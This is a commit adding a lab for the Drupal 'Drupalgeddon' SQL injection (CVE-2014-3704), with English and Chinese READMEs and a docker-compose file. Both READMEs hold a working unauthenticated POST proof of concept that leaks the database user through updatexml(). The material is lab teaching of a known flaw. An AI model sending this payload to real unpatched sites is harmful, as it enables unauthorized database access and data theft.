first commit

drupal/CVE-2014-3704/README.md

@@ -0,0 +1,52 @@
+# Drupal < 7.32 "Drupalgeddon" SQL Injection (CVE-2014-3704)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License.
+
+The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
+
+References:
+
+- <https://www.drupal.org/SA-CORE-2014-005>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704>
+
+## Vulnerable Environment
+
+Execute the following command to start a Drupal 7.31.
+
+```
+docker compose up -d
+```
+
+After the server is started, browse ``http://your-ip:8080`` to see the Drupal installation wizard, and use the default configuration to install it.
+
+Note that the Mysql database name is ``drupal``, the database username and password is ``root``, and the address is ``mysql``:
+
+![](1.png)
+
+After the installation is complete, browse the home page.
+
+![](2.png)
+
+## POC
+
+The SQL injection does not require authentication and can execute malicious SQL statements by sending the following request.
+
+```
+POST /?q=node&destination=node HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 120
+
+pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
+```
+
+As can be seen, the SQL statement reports an error message with user data.
+
+![](3.png)

drupal/CVE-2014-3704/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Drupal < 7.32 "Drupalgeddon" SQL注入漏洞（CVE-2014-3704）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架，在GNU通用公共许可证下分发。
+
+在Drupal Core 7.32版本之前的7.x版本中，数据库抽象API中的expandArguments函数没有正确构造预处理语句，这允许远程攻击者通过包含精心构造的键的数组进行SQL注入攻击。
+
+参考链接：
+
+- <https://www.drupal.org/SA-CORE-2014-005>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704>
+
+## 环境搭建
+
+执行如下命令启动一个Drupal 7.31服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`将会看到Drupal的安装向导，使用默认配置进行安装。
+
+注意：MySQL数据库名为`drupal`，数据库用户名和密码均为`root`，地址为`mysql`：
+
+![](1.png)
+
+安装完成后，即可访问首页：
+
+![](2.png)
+
+## 漏洞复现
+
+该SQL注入漏洞无需身份认证，可以通过发送以下请求来执行恶意SQL语句：
+
+```
+POST /?q=node&destination=node HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 120
+
+pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
+```
+
+如图所示，SQL语句报错信息中包含了用户数据：
+
+![](3.png)

drupal/CVE-2014-3704/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+ web:
+   image: vulhub/drupal:7.31
+   depends_on:
+    - mysql
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=drupal